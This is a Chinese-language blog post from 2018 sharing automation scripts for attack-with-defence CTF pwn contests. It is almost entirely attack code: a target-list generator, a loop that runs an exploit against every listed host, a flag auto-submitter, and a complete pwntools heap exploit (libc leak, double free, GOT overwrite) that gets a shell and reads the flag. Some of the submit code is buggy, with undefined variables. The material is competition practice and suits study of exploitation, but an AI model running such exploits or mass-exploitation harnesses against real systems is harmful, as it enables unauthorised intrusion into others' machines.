安全

pwn_AWD自动化脚本

pwn_AWD自动化脚本

Posted by XT on December 7, 2018

pwn_AWD自动化脚本

脚本篇

自动get ip脚本

filename = 'url.txt'
with open(filename,'w') as f:
    for i in range(255):
        url="127.0."+str(i)+".1:9999\n"
        f.write(url)

自动攻击脚本

def exploit(host,port):
	try:
		flag = pwn(host,port)
		submit(flag,token)
	except Exception as m:
		print(m)
def exploit_it():
	with open("url.txt")as f :
		for line in f:
			host = line.split(":")[0]
			port = int(line.split(":")[1])
			print "[+] Exploiting:%s:%d" % (host,port)
			exploit(host,port)

自动提交脚本(要安装reques库)

def submit(flag, token):
	url = "wangzhi"
	pos = {
	    "flag":flag,
	    "token":token
	}

	print "[+] Submiting flag : [%s]" % (pos)
	response = requests.post(url,data=data)
	content = response.content
	print "[+] Content : %s " % (content)
	if failed in content:
		print "[-]failed"
		return False
	else:
		print "[+] Success!"
		return True

pwn题目的示范

def get_flag(host,port):
    context(os="linux",arch="amd64",timeout=30)
#    context.log_level="DEBUG"
    p=remote(host,port)

    context.terminal = ['tmux', 'split', '-h']
    elf=ELF("./main")
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#    gdb.attach(p,"b *0x400bd0")
    newpost(p,"AAAAAA")#0
    newpost(p,"BBBBBBB")#1
    unsort(p,"6666666") #2
    newpost(p,"hhhhh") #3 0x6020b8 
    #pause()
    delete(p,"2")
    newpost(p,"")

    show(p)
    libc.address=u64(p.recvuntil("\x7f",timeout=3)[-6: ] + '\0\0')-  250-0x3c4b10
    success("libc -> {:#x}".format(libc.address))

    delete(p,"0")
    delete(p,"1")
    delete(p,"0")
#    pause()
    newpost(p,p64(0x60208d))
#    pause()

    newpost(p,"/bin/sh\0")
    #pause()
    newpost(p,"")
    ioaddr=0x7f55aab438e0-0x7f55aa77f000
    ####test
#    newpost(p,"")
#    pause()
    ####test
    newpost(p,'qrstuvwxyz'+"ABCDEFGHIJKLMNOPQ"+p64(0x602018))

    p.sendlineafter("Your Choice:","2")
    p.sendlineafter("Enter the Index:","3")
    content=p64(libc.address+283536)[:-1]
    p.sendafter("Enter the Content:",content)


    #edit("4","/bin/sh")
    #pause()
    delete(p,"6")
    p.sendline("cat flag")
    flag=p.recvline()
    p.close()##!!!!!!!!!!!!!!!!!!!!!重要
    return flag
#################这些都不重要###################################################
def newpost(p,content):
    p.sendlineafter("Your Choice:","1")
    p.sendlineafter("Enter the Content:",content)
    p.recvline()

def edit(p,index,content):
    p.sendlineafter("Your Choice:","2")
    p.sendlineafter("Enter the Index:",index)
    p.sendlineafter("Enter the Content:",content)

def delete(p,index):
    p.sendlineafter("Your Choice:","3")
    p.sendlineafter("Enter the Index:",index)

def show(p):
    p.sendlineafter("Your Choice:","4")

def unsort(p,content):
    p.sendlineafter("Your Choice:","5")
    p.sendlineafter("Enter the Content:",content)
CATALOG
    FEATURED TAGS
    文艺 安全 面试 运维 开发